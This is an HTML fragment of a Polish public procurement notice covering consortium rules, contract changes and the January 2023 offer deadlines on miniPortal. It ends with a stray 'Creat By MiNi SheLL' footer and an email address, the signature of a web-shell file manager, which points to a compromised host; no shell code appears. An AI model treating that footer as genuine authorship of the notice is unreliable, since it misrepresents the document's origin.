class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego w rozumieniu art. 58 ust. 1 Pzp (np. konsorcja), są zobowiązani ustanowić pełnomocnika do reprezentowania. Pełnomocnictwo musi zawierać umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do Oferty w postaci dokumentu elektronicznego podpisanego podpisem elektronicznym; osobistym lub kwalifikowanym lub zaufanym, przez osoby uprawnione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. <br/>2.	Zgodnie z art. 4 ust. 2 ustawy z dnia 6 marca 2018 r. prawo przedsiębiorców (t.jedn.: Dz.U. z 2019 r., poz. 1292) za przedsiębiorców uznaje się wspólników spółki cywilnej w zakresie wykonywanej przez nich działalności gospodarczej. <br/>1)	Oferta złożona przez spółkę cywilną jest traktowana jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia i wspólników dotyczą ustalenia tego Rozdziału.<br/>2)	Oferta spółki cywilnej musi być podpisana przez wszystkich wspólników lub zawierać pełnomocnictwo opisane w ust. 1 lub dokument, z którego wynika pełnomocnictwo (np. poświadczone za zgodność z oryginałem kopię umowy spółki cywilnej lub uchwałę). <br/>3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie. <br/>4.	Brak podstaw do wykluczenia każdy z Wykonawców występujących wspólnie musi wykazać samodzielnie. Dokumenty/oświadczenia dotyczące potwierdzenia braku podstaw do wykluczenia składane są osobno przez każdego z Wykonawców.<br/>5.	Dokumenty/oświadczenia dotyczące Wykonawcy są podpisywane odpowiednio przez tego Wykonawcę, którego dotyczą.<br/>6.	Korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako reprezentant pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami SWZ w Rozdziale XVII, w zakresie określonym w § 10 projektu postanowień, które zostaną wprowadzone do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-11 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/ , za pośrednictwem ePuap</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-11 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca chcący wziąć udział w postępowaniu o zamówienie musi zapoznać się z treścią specyfikacji warunków zamówienia (SWZ) -tylko całościowe zapoznanie się z tekstem SWZ (dostępna na miniPortalu) umożliwi skuteczne złożenie oferty. Wykonawca podczas czynności składania ofert winien posługiwać się jedynie identyfikatorem Postępowania z miniPortalu. W sytuacji, w której Wykonawca składając ofertę przez miniPortal, wprowadzi w formularzu ID z Platformy eZamówienia, uwidoczniony w niniejszym ogłoszeniu (patrz: Sekcja II pkt 2.4), jego oferta nie pojawi się na liście złożonych ofert i nie będzie możliwości jej odszyfrowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com